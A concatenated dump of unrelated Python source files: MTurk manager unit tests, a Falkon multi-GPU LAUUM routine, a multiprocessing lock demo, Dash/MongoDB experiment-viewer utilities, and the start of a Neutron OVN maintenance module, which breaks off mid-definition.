opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.mturk_manager._onboard_new_agent = mock.MagicMock()
self.mturk_manager._wait_for_task_expirations = mock.MagicMock()
self.mturk_manager.task_group_id = 'TEST_GROUP_ID'
self.mturk_manager.server_url = 'https://127.0.0.1'
self.mturk_manager.task_state = self.mturk_manager.STATE_ACCEPTING_WORKERS
self.mturk_manager._setup_socket()
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_1,
'hit_id': TEST_HIT_ID_1,
'assignment_id': TEST_ASSIGNMENT_ID_1,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
alive_packet = Packet(
'',
'',
'',
'',
'',
{
'worker_id': TEST_WORKER_ID_2,
'hit_id': TEST_HIT_ID_2,
'assignment_id': TEST_ASSIGNMENT_ID_2,
'conversation_id': None,
},
'',
)
self.mturk_manager._on_alive(alive_packet)
self.agent_1 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_1
)
self.agent_2 = self.mturk_manager.worker_manager.get_agent_for_assignment(
TEST_ASSIGNMENT_ID_2
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_socket_dead(self):
"""
Test all states of socket dead calls.
"""
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
manager.socket_manager.close_channel = mock.MagicMock()
agent.reduce_state = mock.MagicMock()
agent.set_status = mock.MagicMock(wraps=agent.set_status)
manager._handle_agent_disconnect = mock.MagicMock(
wraps=manager._handle_agent_disconnect
)
# Test status none
agent.set_status(AssignState.STATUS_NONE)
agent.set_status.reset_mock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
manager._handle_agent_disconnect.assert_not_called()
# Test status onboarding
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
self.assertFalse(agent.disconnected)
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
# test status waiting
agent.disconnected = False
agent.set_status(AssignState.STATUS_WAITING)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
manager._remove_from_agent_pool.assert_called_once_with(agent)
# test status in task
agent.disconnected = False
agent.set_status(AssignState.STATUS_IN_TASK)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
manager.socket_manager.close_channel.assert_called_once_with(
agent.get_connection_id()
)
self.assertTrue(agent.disconnected)
manager._handle_agent_disconnect.assert_called_once_with(
worker_id, assignment_id
)
# test status done
agent.disconnected = False
agent.set_status(AssignState.STATUS_DONE)
agent.set_status.reset_mock()
agent.reduce_state.reset_mock()
manager._handle_agent_disconnect.reset_mock()
manager.socket_manager.close_channel.reset_mock()
manager._add_agent_to_pool(agent)
manager._remove_from_agent_pool = mock.MagicMock()
manager._on_socket_dead(worker_id, assignment_id)
self.assertNotEqual(agent.get_status(), AssignState.STATUS_DISCONNECT)
agent.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
self.assertFalse(agent.disconnected)
manager._handle_agent_disconnect.assert_not_called()
def test_send_message_command(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = self.agent_1.worker_id
assignment_id = self.agent_1.assignment_id
agent.set_last_command = mock.MagicMock()
manager.socket_manager.queue_packet = mock.MagicMock()
# Send a command
data = {'text': data_model.COMMAND_SEND_MESSAGE}
manager.send_command(worker_id, assignment_id, data)
agent.set_last_command.assert_called_once_with(data)
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertEqual(packet.data, data)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_COMMAND)
# Send a message
data = {'text': 'This is a test message'}
agent.set_last_command.reset_mock()
manager.socket_manager.queue_packet.reset_mock()
message_id = manager.send_message(worker_id, assignment_id, data)
agent.set_last_command.assert_not_called()
manager.socket_manager.queue_packet.assert_called_once()
packet = manager.socket_manager.queue_packet.call_args[0][0]
self.assertIsNotNone(packet.id)
self.assertEqual(packet.type, Packet.TYPE_MESSAGE)
self.assertEqual(packet.receiver_id, worker_id)
self.assertEqual(packet.assignment_id, assignment_id)
self.assertNotEqual(packet.data, data)
self.assertEqual(data['text'], packet.data['text'])
self.assertEqual(packet.data['message_id'], message_id)
self.assertEqual(packet.data['type'], data_model.MESSAGE_TYPE_MESSAGE)
def test_free_workers(self):
manager = self.mturk_manager
manager.socket_manager.close_channel = mock.MagicMock()
manager.free_workers([self.agent_1])
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
def test_force_expire_hit(self):
manager = self.mturk_manager
agent = self.agent_1
worker_id = agent.worker_id
assignment_id = agent.assignment_id
socket_manager = manager.socket_manager
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
# Test expiring finished worker
agent.set_status(AssignState.STATUS_DONE)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_not_called()
socket_manager.close_channel.assert_not_called()
self.assertEqual(agent.get_status(), AssignState.STATUS_DONE)
# Test expiring not finished worker with default args
agent.set_status(AssignState.STATUS_ONBOARDING)
manager.force_expire_hit(worker_id, assignment_id)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertIsNotNone(data['inactive_text'])
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
# Test expiring not finished worker with custom arguments
agent.set_status(AssignState.STATUS_ONBOARDING)
agent.hit_is_expired = False
manager.send_command = mock.MagicMock()
socket_manager.close_channel = mock.MagicMock()
special_disconnect_text = 'You were disconnected as part of a test'
test_ack_function = mock.MagicMock()
manager.force_expire_hit(
worker_id,
assignment_id,
text=special_disconnect_text,
ack_func=test_ack_function,
)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
used_worker_id, used_assignment_id, data = args[0], args[1], args[2]
ack_func = manager.send_command.call_args[1]['ack_func']
ack_func()
self.assertEqual(worker_id, used_worker_id)
self.assertEqual(assignment_id, used_assignment_id)
self.assertEqual(data['text'], data_model.COMMAND_EXPIRE_HIT)
self.assertEqual(agent.get_status(), AssignState.STATUS_EXPIRED)
self.assertTrue(agent.hit_is_expired)
self.assertEqual(data['inactive_text'], special_disconnect_text)
socket_manager.close_channel.assert_called_once_with(agent.get_connection_id())
test_ack_function.assert_called()
def test_get_qualifications(self):
manager = self.mturk_manager
mturk_utils = MTurkManagerFile.mturk_utils
mturk_utils.find_or_create_qualification = mock.MagicMock()
# create a qualification list with nothing but a provided junk qual
fake_qual = {
'QualificationTypeId': 'fake_qual_id',
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept',
}
qualifications = manager.get_qualification_list([fake_qual])
self.assertListEqual(qualifications, [fake_qual])
self.assertListEqual(manager.qualifications, [fake_qual])
mturk_utils.find_or_create_qualification.assert_not_called()
# Create a qualificaiton list using all the default types
disconnect_qual_name = 'disconnect_qual_name'
disconnect_qual_id = 'disconnect_qual_id'
block_qual_name = 'block_qual_name'
block_qual_id = 'block_qual_id'
max_time_qual_name = 'max_time_qual_name'
max_time_qual_id = 'max_time_qual_id'
unique_qual_name = 'unique_qual_name'
unique_qual_id = 'unique_qual_id'
def return_qualifications(qual_name, _text, _sb):
if qual_name == disconnect_qual_name:
return disconnect_qual_id
if qual_name == block_qual_name:
return block_qual_id
if qual_name == max_time_qual_name:
return max_time_qual_id
if qual_name == unique_qual_name:
return unique_qual_id
mturk_utils.find_or_create_qualification = return_qualifications
manager.opt['disconnect_qualification'] = disconnect_qual_name
manager.opt['block_qualification'] = block_qual_name
manager.opt['max_time_qual'] = max_time_qual_name
manager.opt['unique_qual_name'] = unique_qual_name
manager.is_unique = True
manager.has_time_limit = True
manager.qualifications = None
qualifications = manager.get_qualification_list()
for qual in qualifications:
self.assertEqual(qual['ActionsGuarded'], 'DiscoverPreviewAndAccept')
self.assertEqual(qual['Comparator'], 'DoesNotExist')
for qual_id in [
disconnect_qual_id,
block_qual_id,
max_time_qual_id,
unique_qual_id,
]:
has_qual = False
for qual in qualifications:
if qual['QualificationTypeId'] == qual_id:
has_qual = True
break
self.assertTrue(has_qual)
self.assertListEqual(qualifications, manager.qualifications)
def test_create_additional_hits(self):
manager = self.mturk_manager
manager.opt['hit_title'] = 'test_hit_title'
manager.opt['hit_description'] = 'test_hit_description'
manager.opt['hit_keywords'] = 'test_hit_keywords'
manager.opt['reward'] = 0.1
mturk_utils = MTurkManagerFile.mturk_utils
fake_hit = 'fake_hit_type'
mturk_utils.create_hit_type = mock.MagicMock(return_value=fake_hit)
mturk_utils.subscribe_to_hits = mock.MagicMock()
mturk_utils.create_hit_with_hit_type = mock.MagicMock(
return_value=('page_url', 'hit_id', 'test_hit_response')
)
manager.server_url = 'test_url'
manager.task_group_id = 'task_group_id'
manager.topic_arn = 'topic_arn'
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
manager.server_url, manager.task_group_id
)
hit_url = manager.create_additional_hits(5)
mturk_utils.create_hit_type.assert_called_once()
mturk_utils.subscribe_to_hits.assert_called_with(
fake_hit, manager.is_sandbox, manager.topic_arn
)
self.assertEqual(len(mturk_utils.create_hit_with_hit_type.call_args_list), 5)
mturk_utils.create_hit_with_hit_type.assert_called_with(
opt=manager.opt,
page_url=mturk_chat_url,
hit_type_id=fake_hit,
num_assignments=1,
is_sandbox=manager.is_sandbox,
)
self.assertEqual(len(manager.hit_id_list), 5)
self.assertEqual(hit_url, 'page_url')
def test_expire_all_hits(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
completed_hit_id = 'completed'
incomplete_1 = 'incomplete_1'
incomplete_2 = 'incomplete_2'
MTurkManagerFile.mturk_utils.expire_hit = mock.MagicMock()
worker_manager.get_complete_hits = mock.MagicMock(
return_value=[completed_hit_id]
)
manager.hit_id_list = [completed_hit_id, incomplete_1, incomplete_2]
manager.expire_all_unassigned_hits()
worker_manager.get_complete_hits.assert_called_once()
expire_calls = MTurkManagerFile.mturk_utils.expire_hit.call_args_list
self.assertEqual(len(expire_calls), 2)
for hit in [incomplete_1, incomplete_2]:
found = False
for expire_call in expire_calls:
if expire_call[0][1] == hit:
found = True
break
self.assertTrue(found)
def test_qualification_management(self):
manager = self.mturk_manager
test_qual_name = 'test_qual'
other_qual_name = 'other_qual'
test_qual_id = 'test_qual_id'
worker_id = self.agent_1.worker_id
mturk_utils = MTurkManagerFile.mturk_utils
success_id = 'Success'
def find_qualification(qual_name, _sandbox):
if qual_name == test_qual_name:
return test_qual_id
return None
mturk_utils.find_qualification = find_qualification
mturk_utils.give_worker_qualification = mock.MagicMock()
mturk_utils.remove_worker_qualification = mock.MagicMock()
mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=success_id
)
# Test give qualification
manager.give_worker_qualification(worker_id, test_qual_name)
mturk_utils.give_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, None, manager.is_sandbox
)
# Test revoke qualification
manager.remove_worker_qualification(worker_id, test_qual_name)
mturk_utils.remove_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, manager.is_sandbox, ''
)
# Test create qualification can exist
result = manager.create_qualification(test_qual_name, '')
self.assertEqual(result, success_id)
# Test create qualification can't exist failure
result = manager.create_qualification(test_qual_name, '', False)
self.assertIsNone(result)
# Test create qualification can't exist success
result = manager.create_qualification(other_qual_name, '')
self.assertEqual(result, success_id)
def test_partner_disconnect(self):
manager = self.mturk_manager
manager.send_command = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_IN_TASK)
manager._handle_partner_disconnect(self.agent_1)
self.assertEqual(
self.agent_1.get_status(), AssignState.STATUS_PARTNER_DISCONNECT
)
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, self.agent_1.worker_id)
self.assertEqual(assignment_id, self.agent_1.assignment_id)
self.assertDictEqual(data, self.agent_1.get_inactive_command_data())
@testing_utils.retry()
def test_restore_state(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
worker_manager.change_agent_conversation = mock.MagicMock()
manager.send_command = mock.MagicMock()
agent = self.agent_1
agent.conversation_id = 'Test_conv_id'
agent.id = 'test_agent_id'
agent.request_message = mock.MagicMock()
agent.message_request_time = time.time()
test_message = {
'text': 'this_is_a_message',
'message_id': 'test_id',
'type': data_model.MESSAGE_TYPE_MESSAGE,
}
agent.append_message(test_message)
manager._restore_agent_state(agent.worker_id, agent.assignment_id)
self.assertFalse(agent.alived)
manager.send_command.assert_not_called()
worker_manager.change_agent_conversation.assert_called_once_with(
agent=agent, conversation_id=agent.conversation_id, new_agent_id=agent.id
)
agent.alived = True
assert_equal_by(lambda: len(agent.request_message.call_args_list), 1, 0.6)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, agent.worker_id)
self.assertEqual(assignment_id, agent.assignment_id)
self.assertListEqual(data['messages'], agent.get_messages())
self.assertEqual(data['text'], data_model.COMMAND_RESTORE_STATE)
def test_expire_onboarding(self):
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
self.agent_2.set_status(AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
manager.force_expire_hit.assert_called_once_with(
self.agent_2.worker_id, self.agent_2.assignment_id
)
if __name__ == '__main__':
unittest.main(buffer=True)
|
ooc_lauum.py
|
import math
import threading
from typing import List, Optional
import numpy as np
import torch
from falkon.cuda import initialization
from falkon.utils import devices, PropagatingThread
from falkon.utils.helpers import sizeof_dtype
from falkon.options import FalkonOptions, LauumOptions
from .ooc_utils import calc_block_sizes2, prepare_matrix
from .parallel_lauum import par_lauum_f_lower, par_lauum_c_lower, BlockAlloc
from ..utils.tensor_helpers import is_f_contig, is_contig
__all__ = ("gpu_lauum",)
def _parallel_lauum_runner(A, write_opposite: bool, opt: LauumOptions, gpu_info):
# Choose target:
if is_f_contig(A):
target = par_lauum_f_lower
elif is_contig(A):
target = par_lauum_c_lower
else:
raise NotImplementedError("Parallel LAUUM is only implemented for contiguous matrices")
num_gpus = len(gpu_info)
if num_gpus < 1:
raise ValueError(
"Parallel LAUUM should only be run when some GPU is available.")
N = A.shape[0]
dt = A.dtype
dts = sizeof_dtype(dt)
avail_ram = min([g.actual_free_mem for g in gpu_info]) / dts
# Each GPU should be able to hold in memory 2 block columns
max_block_size = int(math.floor(avail_ram / (2*N)))
if max_block_size < 1:
raise RuntimeError(
"Cannot run parallel LAUUM with minimum "
"available memory of %.2fMB" % (avail_ram * dts / 2**20))
block_sizes = calc_block_sizes2(
max_block_size, num_gpus, N, opt.lauum_par_blk_multiplier)
block_allocations: List[BlockAlloc] = []
cur_n = 0
for bs in block_sizes:
block_allocations.append(BlockAlloc(start=cur_n, end=cur_n + bs, length=bs))
cur_n += bs
barrier = threading.Barrier(num_gpus, timeout=1000)
threads = []
for g in gpu_info:
gid_allocs = [i for i in range(len(block_allocations)) if i % num_gpus == g.Id]
cublas_handle = initialization.cublas_handle(g.Id)
if cublas_handle is None:
raise RuntimeError("CUBLAS must be initialized "
"on device %d before running parallel LAUUM." % (g.Id))
t = PropagatingThread(target=target, name="GPU-%d" % (g.Id), args=(
A, block_allocations, gid_allocs, barrier, g.Id, cublas_handle, write_opposite))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
return A
def gpu_lauum(A, upper, overwrite=True, write_opposite=False, opt: Optional[FalkonOptions] = None):
"""
Parameters
-----------
A : ndarray [N, N]
2D positive-definite matrix that will be factorized as
A = U.T @ U (if `upper` is True) or A = L @ L.T if `upper`
is False.
overwrite : bool
Whether to overwrite matrix A or to output the result in a new
buffer.
Notes
------
The factorization will always be the 'lower' version of the factorization
which could however end up on the upper-triangular part of the matrix
in case A is not Fortran contiguous to begin with.
"""
if opt is None:
opt = FalkonOptions()
gpu_info = [v for k, v in devices.get_device_info(opt).items() if k >= 0]
for g in gpu_info:
g.actual_free_mem = min((g.free_memory - 300 * 2 ** 20) * 0.95,
opt.max_gpu_mem * 0.95)
# Start matrix preparations
if isinstance(A, np.ndarray):
Anp = A
elif isinstance(A, torch.Tensor):
Anp = A.numpy()
else:
raise TypeError("Unexpected type encountered for A: %s" % (A.dtype))
if not overwrite:
Anp = np.copy(Anp, order='A')
# Will give a fortran-contiguous numpy array. No copies are performed.
Anp, transposed = prepare_matrix(Anp)
if transposed:
upper = not upper
# Parallel can only do lower C or F-contiguous arrays
# But by transposing as necessary, it is able to run with every combination of inputs.
At = torch.from_numpy(Anp)
if upper:
At = At.T
# The parallel runner chooses based on the contiguity pattern of the inputs.
_parallel_lauum_runner(At, write_opposite, opt, gpu_info)
if transposed:
Anp = Anp.T
if isinstance(A, np.ndarray):
return Anp
else:
return torch.from_numpy(Anp)
|
p5.py
|
from multiprocessing import Process, Lock
def display(k, n):
k.acquire()
print ('Hi', n)
k.release()
if __name__ == '__main__':
lock = Lock()
names = ['Alice', 'Bob', 'Carol', 'Dennis']
for n in names:
p = Process(target=display, args=(lock,n,))
p.start()
p.join()
print("Exiting main")
|
utils.py
|
from line_profiler import LineProfiler
from pymongo import MongoClient
from threading import Thread
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import itertools
from io import BytesIO
from PIL import Image
import pickle
import base64
import numpy as np
import sys
################ **Optimizing Utils** ##################
import time
import sys
def timeFigureUpdate(title):
def wrapper(func):
def timeit(*args):
start = time.time()
x = func(*args)
end = time.time()
# print("Elapsed Time: {}".format(end-start),file=sys.stdout)
sys.stdout.write("Elapsed Time of {} update_figure_and_data_structure function: {}\n".format(title,end-start))
return x
return timeit
return wrapper
def profile(title):
def wrapper(f):
def printProfile(*args):
lp = LineProfiler()
dec_f = lp(f)
output_value = dec_f(*args)
print("Line Profile for:",title)
print("----------------------")
lp.print_stats()
return output_value
return printProfile
return wrapper
##############################################################
class Database():
def __init__(self):
self.client = MongoClient()
self.checkConnection()
## Database utilities
## I do not want the user to accidently delete all their data
# def removeDataBase(self,folder_name):
# self.client.drop_database(folder_name)
def removeFolder(self,database_name,folder_name):
self.client[database_name][folder_name].drop()
def viewDataBase(self,database_name):
'''
show all collections in a folder
'''
# include include_system_collections=False?
for collection in self.client[database_name].list_collection_names():
print(collection)
def getAllFolderIteratorsFromDatabase(self,database_name):
folder_iterators_list= []
folder_names = self.client[database_name].list_collection_names()
for folder_name in folder_names:
iterator = self.client[database_name][folder_name].find()
folder_iterators_list.append(iterator)
return folder_iterators_list
def viewFolder(self,database_name,folder_name):
'''
show all documents in a collection
'''
for doc in self.client[database_name][folder_name].find():
print(doc)
def close(self):
self.client.close()
## Connection utilties, not meant to be used by user
def checkConnection(self):
t = Thread(target=self.testInsert)
t.start()
t.join(2)
if t.is_alive():
raise Exception("Cannot connect to MongoDB")
def testInsert(self):
doc = self.client['test_db']['test_collection']
doc.insert({"Test":1})
doc.remove({"Test":1})
################ **Misc** ##################
from functools import partial
def partial_decomaker(partial_name):
def decorator(func):
partial_func = partial(func,partial_name=partial_name)
return partial_func
return decorator
from inspect import getsource
def code(function):
print(getsource(function))
################ **Functions used to load Data in** ##################
def getParamDict(database_name,folder_name):
mongo = Database()
runs = mongo.client[database_name][folder_name]
## all the runs in the folder
runs_iterator = runs.find()
dict_of_dicts = {}
for run_object in runs_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
dict_of_dicts[time] = Experimental_Parameters
return dict_of_dicts
def getLegendNames(dict_of_param_dicts):
list_of_param_names = []
for time,plot_dict in dict_of_param_dicts.items():
list_of_param_names.append(plot_dict.keys())
legend_names = sorted(set(list(itertools.chain(*list_of_param_names))))
return legend_names
## Object Related
def getDictOfNameObjects(database_name,folder_name,name,f=None):
mongo = Database()
runs = mongo.client[database_name][folder_name]
## all the runs in the folder
runs_iterator = runs.find()
nameObjects_for_each_run = {}
# paramObjects_for_each_run = {}
for run_object in runs_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
# param_objects_for_each_run[time] = Experimental_Parameters
try:
one_run_dict = run_object[name]
if f:
one_run_dict = f(one_run_dict)
nameObjects_for_each_run[time] = one_run_dict
except KeyError:
print("Name does not exist in the run")
mongo.close()
# return nameObjects_for_each_run, paramObjects_for_each_run
return nameObjects_for_each_run
def getBase64Encoding(one_run_dict):
return {image_name:binaryToBase64(binary_image) for image_name,binary_image in one_run_dict.items()}
def binaryToBase64(binary_image):
numpy_matrix=pickle.loads(binary_image)
img = Image.fromarray(np.uint8(numpy_matrix*255),'L')
# base64_string= base64.b64encode(numpy_matrix)
buff = BytesIO()
img.save(buff, format="JPEG")
base64_string = base64.b64encode(buff.getvalue())
buff.close()
return str(base64_string)[2:-1]
def getFigureNames(nameObjects_for_each_run):
list_of_names = []
for time, one_run_dict in nameObjects_for_each_run.items():
list_of_names.append(one_run_dict.keys())
names = sorted(set(list(itertools.chain(*list_of_names))))
return names
##############################################################
def createHTMLRowList(self):
html_row_list = []
for time in self.ordered_thoughtList_keys:
thought_list = self.dict_of_all_thought_lists[time]
title_row = createThoughtsTitle(thought_list,time)
html_row_list.append(title_row)
paragraph_for_each_thought = createThoughts(thought_list)
paragraph_row = html.Div(paragraph_for_each_thought,className='row')
html_row_list.append(paragraph_row)
return html_row_list
## only take 0.1 seconds. So no issue in updating it
# @profile("Thoughts")
def getDictOfAllThoughtLists(database_name):
mongo = Database()
folder_iterators_list = mongo.getAllFolderIteratorsFromDatabase(database_name)
database_dict = {}
for folder_iterator in folder_iterators_list:
dict_of_thoughtlists = getDictOfThoughtLists(folder_iterator)
database_dict.update(dict_of_thoughtlists)
mongo.close()
return database_dict
#########################
def getDictOfThoughtLists(folder_iterator):
dict_of_thoughtlists = {}
for run_object in folder_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
try:
thought_list = run_object['Thoughts']
## eliminating the extra self.folder_name logs
dict_of_thoughtlists[time]=thought_list
except KeyError:
print("Run object does not have 'Thoughts' as a key")
return dict_of_thoughtlists
#########################
def getOrderedKeys(dict_of_thoughtlists):
return sorted(dict_of_thoughtlists.keys())
def createThoughts(list_of_thoughts):
paragraph_list = []
## skipping the folder_names
for thought in list_of_thoughts[1::2]:
paragraph = html.P(thought)
paragraph_list.append(paragraph)
return paragraph_list
def createThoughtsTitle(list_of_thoughts,time):
folder_name = list_of_thoughts[0]
## No need for year and seconds
title_row = html.Div(html.B(time[5:-3]+': '+folder_name),className='row')
return title_row
##############################################################
################ **Functions used During Callbacks** ##################
def getSelectedRunsFromDatatable(rows,selected_row_indices):
if selected_row_indices==[]:
selected_runs= rows
else:
selected_runs = [rows[i] for i in selected_row_indices]
return [run_dict['Time'] for run_dict in selected_runs]
if __name__ == '__main__':
database = Database()
database.client['test_db']['test_collection'].insert_one({"Test":"test"})
database.viewRun('test_db','test_collection')
database.removeRun('test_db','test_collection')
database.viewRun('test_db','test_collection')
|
maintenance.py
|
# Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
def rerun_on_schema_updates(func):
"""Tasks decorated with this will rerun upon database version updates."""
func._rerun_on_schema_updates = True
return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
"""Event listening to reconnections from OVN Northbound DB."""
def __init__(self, driver, version):
self.driver = driver
self.version = version
table = 'Connection'
events = (self.ROW_CREATE,)
super(OVNNBDBReconnectionEvent, self).__init__(events, table, None)
self.event_name = self.__class__.__name__
def run(self, event, row, old):
curr_version = self.driver.get_ovn_nbdb_version()
if self.version != curr_version:
self.driver.nbdb_schema_updated_hook()
self.version = curr_version
class SchemaAwarePeriodicsBase(object):
def __init__(self, ovn_client):
self._nb_idl = ovn_client._nb_idl
self._set_schema_aware_periodics()
self._nb_idl.idl.notify_handler.watch_event(OVNNBDBReconnectionEvent(
self, self.get_ovn_nbdb_version()))
def get_ovn_nbdb_version(self):
return self._nb_idl.idl._db.version
def _set_schema_aware_periodics(self):
self._schema_aware_periodics = []
for name, member in inspect.getmembers(self):
if not inspect.ismethod(member):
continue
schema_upt = getattr(member, '_rerun_on_schema_updates', None)
if schema_upt and periodics.is_periodic(member):
LOG.debug('Schema aware periodic task found: '
'%(owner)s.%(member)s',
{'owner': self.__class__.__name__, 'member': name})
self._schema_aware_periodics.append(member)
@abc.abstractmethod
def nbdb_schema_updated_hook(self):
"""Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._sb_idl = self._ovn_client._sb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip,
'ovn_create': self._ovn_client.create_floatingip,
'ovn_update': self._ovn_client.update_floatingip,
'ovn_delete': self._ovn_client.delete_floatingip,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._get_security_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
